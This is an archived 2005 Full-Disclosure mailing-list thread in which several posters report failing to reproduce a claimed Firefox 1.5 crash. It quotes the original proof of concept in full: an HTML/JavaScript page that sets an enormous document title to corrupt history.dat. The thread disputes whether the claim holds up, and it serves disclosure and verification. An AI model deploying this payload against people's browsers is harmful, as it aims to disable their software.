| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu Dec 8 19:51:55 2005
From: paranoidgeek at gmail.com (Matt)
Subject: re: Firefox 1.5 buffer overflow (poc)
Didn't work here, just made the system go a bit sluggish for a moment, as
you would expect when dealing with a 2.5 million character string.
Firefox :
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051130 Firefox/1.5
Built with :
gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8)
Window manager:
KDE 3.5.0
Possibly it is crashing the Windows API ?
--
Matt
On 12/9/05, Ron <iago@...hallalegends.com> wrote:
>
> I was also unable to replicate it, on Firefox 1.5 i386 Linux EN
>
> ad@...poverflow.com wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > nor a fake , nor you really dont know what is a buffer overflow, but for
> > sure here on my firefox 1.5 EN, the client is much longuer to load to
> > the next boot but it reloads fine without exceptions and there is
> > nothing about a security bug here...
> >
> >
> >> <!-- Firefox 1.5 buffer overflow
> >>
> >> Basically firefox logs all kinda of URL data in it's history.dat file,
> >> this little script will set a really large topic and Firefox will then
> >> save that topic into it's history.dat.. The next time that firefox is
> >> opened, it will instantly crash due to a buffer overflow -- this will
> >> happen everytime until you manually delete the history.dat file --
> >which
> >> most users won't figure out.
> >>
> >> this proof of concept will only prevent someone from reopening
> >> their browser after being exploited. DoS if you will. however, code
> >> execution is possible with some modifcations.
> >>
> >> Tested with Firefox 1.5 on Windows XP SP2.
> >>
> >> ZIPLOCK <sickbeatz@...il.com>
> >>
> >> -->
> >> <html><head><title>heh</title><script type="text/javascript">
> >> function ex() {
> >> var buffer = "";
> >> for (var i = 0; i < 5000; i++) {
> >> buffer += "A";
> >> }
> >> var buffer2 = buffer;
> >> for (i = 0; i < 500; i++) {
> >> buffer2 += buffer;
> >> }
> >> document.title = buffer2;
> >> }
> >> </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
> >> </a></body></html>
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.2 (MingW32)
> >
> > iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+
> > 4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX
> > Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v
> > DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m
> > /Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE
> > crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22
> > cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo
> > pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3
> > 5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi
> > AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw
> > 2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb
> > IFxjTMn8Sc0=
> > =SX09
> > -----END PGP SIGNATURE-----
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051209/a6c30959/attachment.html
Powered by blists - more mailing lists